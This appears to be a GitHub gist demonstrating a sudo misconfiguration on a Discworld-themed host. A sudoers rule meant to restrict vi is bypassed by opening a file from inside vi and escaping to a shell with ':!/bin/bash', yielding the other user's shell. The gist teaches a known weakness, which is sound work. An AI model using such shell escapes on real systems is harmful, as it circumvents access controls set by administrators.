Created
December 6, 2018 02:27
-
-
Save ridingintraffic/55888ada8dbb4ae14a2386ff19589e40 to your computer and use it in GitHub Desktop.
sudo sandwich part 2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@discworld:~# cat /etc/sudoers.d/012_twoflower-nopasswd | |
| twoflower discworld=(rincewind) /usr/bin/vi "" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| twoflower@discworld:/luggage/camera$ sudo -u rincewind vi /luggage/camera/../octavo/spell | |
| Sorry, user twoflower is not allowed to execute '/usr/bin/vi /luggage/camera/../octavo/spell' as rincewind on discworld. | |
| ## you shall not pass(arguments)! | |
| twoflower@discworld:/luggage/camera$ sudo -u rincewind vi | |
| <vim session opens> | |
| ~ | |
| :e ../octavo/spell<enter> | |
| ... | |
| Ashonai. Ebiris. Urshoring. Kvanti. Pythan. N'gurad. Feringomalee. | |
| ## awe nuts you can open the file if you traverse directories after VI is open | |
| ## ...it gets worse | |
| ~<<still in vim>> | |
| :!/bin/bash<enter> | |
| <new shell session opens from vim> | |
| rincewind@discworld:/luggage/camera$ | |
| rincewind@discworld:/luggage/camera$ cd ../octavo/ | |
| rincewind@discworld:/luggage/octavo$ cat spell | |
| Ashonai. Ebiris. Urshoring. Kvanti. Pythan. N'gurad. Feringomalee. | |
| rincewind@discworld:/luggage/octavo$ | |
| ## world sets on fire :( |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment